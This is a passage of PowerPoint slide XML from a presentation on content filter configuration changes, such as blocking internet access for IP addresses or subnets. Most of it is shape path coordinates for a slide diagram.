                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>IP 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addresses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Block</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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all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internet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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from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host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subnets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85971" y="4143755"/>
            <a:ext cx="899160" cy="90068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64635" y="5164835"/>
            <a:ext cx="900684" cy="90068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64635" y="6193535"/>
            <a:ext cx="900684" cy="900683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67684" y="7400543"/>
            <a:ext cx="899160" cy="900684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18379" y="306451"/>
            <a:ext cx="6617334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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Filter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110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Changes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40835" y="760476"/>
            <a:ext cx="9107423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414708" y="5047487"/>
            <a:ext cx="5015865" cy="3082925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5015865" h="3082925">
                <a:moveTo>
                  <a:pt x="5015573" y="3056610"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4974412" y="2988145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4941684" y="2950438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4908347" y="2913354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4874425" y="2876893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4839906" y="2841066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4804803" y="2805887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4769142" y="2771330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4732909" y="2737421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4696142" y="2704134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4658817" y="2671508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4620971" y="2639517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4582604" y="2608161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4543717" y="2577465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4504321" y="2547404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4464431" y="2517991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4424057" y="2489238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4383214" y="2461133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4341888" y="2433675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4300105" y="2406891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4257878" y="2380742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4215219" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4172115" y="2330450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128592" y="2306294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4084663" y="2282799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4040327" y="2259965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3995597" y="2237803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3950474" y="2216315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3904983" y="2195487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3859123" y="2175332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3812908" y="2155863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3766337" y="2137054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3719436" y="2118931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3672192" y="2101481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3624643" y="2084705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4233303" y="1552130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4293451" y="1589697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336554" y="1606207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4382351" y="1616481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4430331" y="1620012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478299" y="1616481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4524095" y="1606207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4567199" y="1589697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4607103" y="1567472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4643310" y="1540014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4675327" y="1507832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4702657" y="1471447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4724768" y="1431353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4741202" y="1388059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4751413" y="1342072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4754943" y="1293876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4751413" y="1245692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4741202" y="1199705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4724768" y="1156411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4702657" y="1116317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4675327" y="1079931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4643310" y="1047750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4607103" y="1020292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4567199" y="998067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4524095" y="981557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478299" y="971283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4430331" y="967740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4382351" y="971283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336554" y="981557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4293451" y="998067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4253547" y="1020292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4217340" y="1047750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4185323" y="1079931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4157992" y="1116317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4135882" y="1156411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4119448" y="1199705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4109237" y="1245692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4105719" y="1293876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4109237" y="1342072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4119448" y="1388059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4135882" y="1431353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4157992" y="1471447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178947" y="1499362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3552507" y="2062734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3505377" y="2046732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3457727" y="2031542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3409594" y="2017166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3361004" y="2003628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3311982" y="1990902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3262553" y="1978990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3212757" y="1967903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3162592" y="1957641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112109" y="1948205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3061335" y="1939582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3010281" y="1931784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2958985" y="1924799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2907474" y="1918639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2855772" y="1913305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2803906" y="1908797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2751912" y="1905101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2699804" y="1902218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2647619" y="1900174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2595372" y="1898942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543111" y="1898523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543111" y="649617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2600807" y="638467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2643911" y="621957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683814" y="599732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2720022" y="572274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2752039" y="540092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2771940" y="513588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775267" y="513588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775267" y="509181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2779369" y="503707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2801480" y="463613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2817914" y="420319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2828125" y="374332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2831655" y="326136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2828125" y="277952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2817914" y="231965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2801480" y="188671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2779369" y="148577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775267" y="143116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775267" y="138684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2771927" y="138684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2752039" y="112191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2720022" y="80010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683814" y="52552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2643911" y="30327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2600807" y="13817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2555011" y="3543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2507043" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459063" y="3543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413266" y="13817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370163" y="30327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2330259" y="52552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2294051" y="80010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2262035" y="112191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2242134" y="138684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2238819" y="138684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2238819" y="143103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2234704" y="148577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212594" y="188671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196160" y="231965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2185949" y="277952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2182431" y="326136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2185949" y="374332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196160" y="420319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212594" y="463613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2234704" y="503707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2238819" y="509193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2238819" y="513588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2242121" y="513588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2262035" y="540092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2294051" y="572274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2330259" y="599732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370163" y="621957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413266" y="638467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459063" y="648741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2470975" y="649630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2470975" y="1898523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2419007" y="1898929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2367267" y="1900148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2315756" y="1902180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2264460" y="1905025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213381" y="1908670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2162530" y="1913128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2111908" y="1918398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2061489" y="1924481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2011311" y="1931377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1961349" y="1939074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1911604" y="1947583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1862086" y="1956917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1812785" y="1967039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1763712" y="1977986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1714868" y="1989734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1666240" y="2002294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617827" y="2015667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1569656" y="2029841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839050" y="1407261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878192" y="1344485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894626" y="1301191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904836" y="1255204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908367" y="1207008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904836" y="1158824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894626" y="1112837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878192" y="1069543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856081" y="1029449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828751" y="993063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796734" y="960882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760526" y="933424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720623" y="911199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677519" y="894689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631723" y="884415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583755" y="880872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535774" y="884415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="489978" y="894689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446874" y="911199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406971" y="933424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370763" y="960882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338747" y="993063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311416" y="1029449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289306" y="1069543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272872" y="1112837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262661" y="1158824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259143" y="1207008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262661" y="1255204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272872" y="1301191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289306" y="1344485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311416" y="1384579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338747" y="1420964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370763" y="1453146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406971" y="1480604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446874" y="1502829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="489978" y="1519339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535774" y="1529613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583755" y="1533144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631723" y="1529613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677519" y="1519339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720623" y="1502829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760526" y="1480604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="789813" y="1458391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1497647" y="2051812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1448739" y="2066798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400175" y="2082546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351953" y="2099030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1304099" y="2116264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256614" y="2134235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1209484" y="2152929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162748" y="2172360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1116406" y="2192502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1070444" y="2213368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024902" y="2234946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979766" y="2257221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935050" y="2280196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="890752" y="2303869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="846899" y="2328214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803478" y="2353259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760514" y="2378964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718007" y="2405354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675970" y="2432405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="634403" y="2460104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="593305" y="2488463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552704" y="2517470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512610" y="2547124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="473011" y="2577414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="433920" y="2608326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395351" y="2639872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357301" y="2672029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319798" y="2704808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282829" y="2738196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246418" y="2772181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210553" y="2806763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175260" y="2841942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140550" y="2877705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106400" y="2914040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72859" y="2950959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39903" y="2988449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7556" y="3026486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3056610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5803" y="3066529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19494" y="3070288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30403" y="3081083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43548" y="3082620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56705" y="3077997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67627" y="3070288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98831" y="3033026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130657" y="2996336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163080" y="2960217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196100" y="2924683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229704" y="2889720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="263880" y="2855341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298627" y="2821546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333921" y="2788348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369773" y="2755747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406158" y="2723743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443090" y="2692336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="480529" y="2661551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518477" y="2631363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556933" y="2601798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="595884" y="2572842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635317" y="2544508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675233" y="2516809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715619" y="2489733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756450" y="2463292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797737" y="2437485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839470" y="2412327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881621" y="2387803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="924204" y="2363927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967193" y="2340711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010589" y="2318143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1054392" y="2296236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098562" y="2275001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143127" y="2254427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1188046" y="2234514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233322" y="2215286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278953" y="2196731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324927" y="2178862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371231" y="2161679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1417853" y="2145182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1464805" y="2129371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1512049" y="2114270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559585" y="2099856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1607413" y="2086152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1655521" y="2073160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1703895" y="2060879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752523" y="2049310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1801406" y="2038464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850529" y="2028329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1899894" y="2018931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1949475" y="2010270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999272" y="2002332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2049272" y="1995131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099462" y="1988680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2149856" y="1982965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2200414" y="1978012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2251151" y="1973808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2302040" y="1970354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2353081" y="1967661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404275" y="1965731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2455595" y="1964575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2507043" y="1964182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2559100" y="1964575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2610993" y="1965731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2662707" y="1967661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714244" y="1970354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2765590" y="1973808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2816733" y="1978012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2867672" y="1982965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2918396" y="1988680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2968904" y="1995131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3019183" y="2002332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3069234" y="2010270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3119043" y="2018931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3168586" y="2028329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3217888" y="2038464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3266922" y="2049310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3315690" y="2060879"/>
                </a:lnTo>
                <a:lnTo>
